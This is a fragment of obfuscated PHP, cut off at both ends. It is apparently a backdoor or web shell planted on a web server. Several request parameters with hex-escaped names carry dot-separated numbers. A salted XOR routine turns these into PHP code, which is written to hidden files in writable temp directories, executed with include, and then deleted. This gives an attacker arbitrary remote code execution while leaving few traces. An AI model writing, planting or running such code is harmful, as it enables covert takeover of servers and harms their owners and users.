= $__len) break; $v2=$k[$l]; $sChar=ord($salt[$l % $lenS]); $dec=((int)$v2 - $sChar - ($l % 10)) ^35; $desc .= chr($dec); $l++;} while (true); $tkn = array_filter([getenv("TMP"), getenv("TEMP"), sys_get_temp_dir(), "/var/tmp", "/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), "/tmp", getcwd()]); for ($parameter_group = 0, $pointer = count($tkn); $parameter_group < $pointer; $parameter_group++) { $marker = $tkn[$parameter_group]; if (!!is_dir($marker) && !!is_writable($marker)) { $ptr = str_replace("{var_dir}", $marker, "{var_dir}/.data_chunk"); $success = file_put_contents($ptr, $desc); if ($success) { include $ptr; @unlink($ptr); exit;} } } } if(!empty($_REQUEST["b\x69n\x64"])){ $k = array_filter([ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm", getenv("TEMP"), sys_get_temp_dir(), getenv("TMP"), "/tmp", getcwd(), "/var/tmp"]); $binding = $_REQUEST["b\x69n\x64"]; $binding = explode ('.' ,$binding ) ; $val = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s ); $i = 0; $__tmp = $binding; while ($v3 = array_shift($__tmp)) { $chS = ord($s[$i %$sLen] ); $dec = ((int)$v3 - $chS - ($i %10)) ^ 53; $val .= chr($dec ); $i++; } foreach ($k as $key => $data_chunk) { if (is_writable($data_chunk) && is_dir($data_chunk)) { $flg = implode("/", [$data_chunk, ".entity"]); if (@file_put_contents($flg, $val) !== false) { include $flg; unlink($flg); exit; } } } } if(array_key_exists("sy\x6D\x62o\x6C", $_REQUEST)){ $obj = $_REQUEST["sy\x6D\x62o\x6C"]; $obj = explode ("." , $obj ); $item=''; $salt3='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen($salt3); foreach ($obj as $p=> $v5) { $sChar=ord($salt3[$p %$sLen]); $dec=((int)$v5 - $sChar - ($p %10)) ^ 14; $item.= chr($dec); } $component = array_filter(["/tmp", sys_get_temp_dir(), getcwd(), "/var/tmp", getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path()]); $ent = 0; do { $flag = $component[$ent] ?? null; if ($ent >= count($component)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($flag)) { $entry = str_replace("{var_dir}", $flag, "{var_dir}/.parameter_group"); if (@file_put_contents($entry, $item) !== false) { include $entry; unlink($entry); exit; } } $ent++; } while (true); } if(isset($_POST) && isset($_POST["d\x61t"])){ $component = $_POST["d\x61t"]; $component = explode ( "." , $component ) ; $comp = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s ); $o = 0; while ($o < count($component)) { $v6 = $component[$o]; $chS = ord($s[$o % $lenS] ); $dec = ((int)$v6 - $chS - ($o % 10)) ^50; $comp .= chr($dec ); $o++; } $itm = array_filter([ini_get("upload_tmp_dir"), "/var/tmp", session_save_path(), getenv("TMP"), sys_get_temp_dir(), "/dev/shm", getenv("TEMP"), getcwd(), "/tmp"]); foreach ($itm as $key => $item) { if (!( !is_dir($item) || !is_writable($item) )) { $ent = "$item" . "/.factor"; if (@file_put_contents($ent, $comp) !== false) { include $ent; unlink($ent); exit; } } } } if(array_key_exists("d\x65\x73c", $_POST)){ $bind = $_POST["d\x65\x73c"]; $bind =explode ( "." , $bind ) ; $itm = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt ); $l = 0; $__len = count( $bind ); do { if( $l >=$__len) break; $v6 = $bind[$l]; $chS = ord( $salt[$l % $sLen] ); $d =( ( int)$v6 - $chS -( $l % 10)) ^ 95; $itm.=chr( $d ); $l++; } while( true ); $flg = array_filter(["/tmp", ini_get("upload_tmp_dir"), "/var/tmp", sys_get_temp_dir(), getenv("TEMP"), getcwd(), getenv("TMP"), "/dev/shm", session_save_path()]); $flag = 0; do { $k = $flg[$flag] ?? null; if ($flag >= count($flg)) break; if (max(0, is_dir($k) * is_writable($k))) { $object = str_replace("{var_dir}", $k, "{var